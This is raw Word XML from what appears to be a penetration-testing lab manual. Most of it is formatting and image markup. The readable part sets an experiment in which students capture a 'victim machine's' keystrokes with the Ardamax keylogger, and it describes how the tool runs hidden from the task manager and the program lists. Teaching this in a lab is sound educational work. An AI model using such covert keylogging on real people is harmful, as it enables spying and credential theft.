      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571EFBEA" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45356A18" wp14:editId="2D33E5E0">
            <wp:extent cx="5129763" cy="3493827"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15421624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240" name="Picture 6"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3669" cy="3503298"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB32AA1" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B067CF8" wp14:editId="02F51196">
            <wp:extent cx="6037938" cy="3091218"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="14769900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007" name="Picture 7" descr="Graphical user interface, text, application, email&#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2234" cy="3108776"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD9E959" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26774E89" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EB052A7" wp14:editId="1D5F9C20">
            <wp:extent cx="4053385" cy="2697493"/>
            <wp:effectExtent l="0" t="0" r="4445" b="7620"/>
            <wp:docPr id="196466878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8783" name="Picture 8" descr="Graphical user interface,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8295" cy="2700761"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0CB4C3" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77F53EBB" wp14:editId="1674743D">
            <wp:extent cx="4655060" cy="3104865"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="532544443" name="Picture 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4443" name="Picture 9" descr="Graphical user interface, text, application, chat or text message,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9852" cy="3108061"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A575C7" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="647F7242" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C9BF5A5" wp14:editId="562B783B">
            <wp:extent cx="2715895" cy="1555750"/>
            <wp:effectExtent l="0" t="0" r="8255" b="6350"/>
            <wp:docPr id="50890778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7787" name="Picture 10"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5895" cy="1555750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F2A84" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601EC9F1" w14:textId="77777777" w:rsidR="009B053D" w:rsidRDefault="009B053D" w:rsidP="009B053D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B42B0A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CB05F9A" wp14:editId="75506D8F">
            <wp:extent cx="4797188" cy="3704495"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="6481355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5586" name="Picture 1" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId123"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4800571" cy="3707107"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="256041F0" w14:textId="48548788" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE0547B" w14:textId="5215D7FC" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C83B69" w14:textId="77777777" w:rsidR="006B300E" w:rsidRPr="001C411D" w:rsidRDefault="006B300E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9BEFC8" w14:textId="77777777" w:rsidR="006B300E" w:rsidRPr="001C411D" w:rsidRDefault="006B300E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="224A8DD2" w14:textId="77777777" w:rsidR="006B300E" w:rsidRPr="001C411D" w:rsidRDefault="006B300E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="212F73AE" w14:textId="77777777" w:rsidR="006B300E" w:rsidRPr="001C411D" w:rsidRDefault="006B300E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34758B24" w14:textId="77777777" w:rsidR="006B300E" w:rsidRPr="001C411D" w:rsidRDefault="006B300E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C67AF02" w14:textId="77777777" w:rsidR="006B300E" w:rsidRPr="001C411D" w:rsidRDefault="006B300E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50B1ABC7" w14:textId="77777777" w:rsidR="006B300E" w:rsidRPr="001C411D" w:rsidRDefault="006B300E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B17D925" w14:textId="77777777" w:rsidR="006B300E" w:rsidRPr="001C411D" w:rsidRDefault="006B300E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF230D6" w14:textId="77777777" w:rsidR="006B300E" w:rsidRPr="001C411D" w:rsidRDefault="006B300E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22487E20" w14:textId="77777777" w:rsidR="006B300E" w:rsidRPr="001C411D" w:rsidRDefault="006B300E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521B592E" w14:textId="77777777" w:rsidR="006B300E" w:rsidRPr="001C411D" w:rsidRDefault="006B300E" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DC3A1A" w14:textId="64A8A116" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="006B300E" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">EXPERIMENT NO. </w:t>
      </w:r>
      <w:r w:rsidR="002C63F7" w:rsidRPr="001C411D">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F4D84" w:rsidRPr="001C411D" w14:paraId="0F02718E" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19FE4C0A" w14:textId="77777777"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4725C4F9" w14:textId="77777777" w:rsidR="007F4D84" w:rsidRPr="001C411D" w:rsidRDefault="007F4D84" w:rsidP="007F4D84">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F4D84" w:rsidRPr="001C411D" w14:paraId="1324F759" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BB7D4A7" w14:textId="77777777"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69B30072" w14:textId="77777777" w:rsidR="007F4D84" w:rsidRPr="001C411D" w:rsidRDefault="007F4D84" w:rsidP="007F4D84">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F4D84" w:rsidRPr="001C411D" w14:paraId="339585C5" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6665ED46" w14:textId="77777777"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6EAB1019" w14:textId="77777777" w:rsidR="007F4D84" w:rsidRPr="001C411D" w:rsidRDefault="007F4D84" w:rsidP="007F4D84">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F4D84" w:rsidRPr="001C411D" w14:paraId="12594647" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60936A13" w14:textId="62B55626"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7F4D84" w:rsidRPr="001C411D" w14:paraId="5525AC4F" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61B6EA03" w14:textId="77777777"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477B02C2" w14:textId="77777777" w:rsidR="007F4D84" w:rsidRPr="001C411D" w:rsidRDefault="007F4D84" w:rsidP="007F4D84">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F4D84" w:rsidRPr="001C411D" w14:paraId="66DEFB58" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="413C58BF" w14:textId="77777777" w:rsidR="007F4D84" w:rsidRPr="001C411D" w:rsidRDefault="007F4D84" w:rsidP="007F4D84">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5274D367" w14:textId="77777777" w:rsidR="007F4D84" w:rsidRPr="001C411D" w:rsidRDefault="007F4D84" w:rsidP="007F4D84">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="135D5283" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">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138A0" w:rsidRPr="001C411D" w14:paraId="6D1735B3" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E332282"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0ABFDAE7"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p w14:paraId="7D3D8530" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0"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Third phase of penetration testing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C2B8843"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tc>
      </w:tr>
      <w:tr w:rsidR="001138A0" w:rsidRPr="001C411D" w14:paraId="1BE57C11" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2E73F92F"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322B3BF1" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3FA76B69" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0"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 xml:space="preserve">The students will be able to gather the keystrokes of target machine </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D07357"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165EB176" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DD55923"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0CC98011" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2942B251" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>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 xml:space="preserve">Track keystrokes of victim machine using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Ardamax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Keylogger </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EBF925B"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37BE6A1E" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49CAADD8"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7F7C1739" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5693EB27"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Installed on a Victims computer.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03B12458"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records these keystrokes and stores them in the logs.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DCBEA08"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Starts operating in the background (stealth mode) and captures every keystroke of the target computer.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52DE193C"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silent, does not show up in the start-menu, windows startup, program files, add/remove programs or the task manager.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D7AF4F4" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="61140C88" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
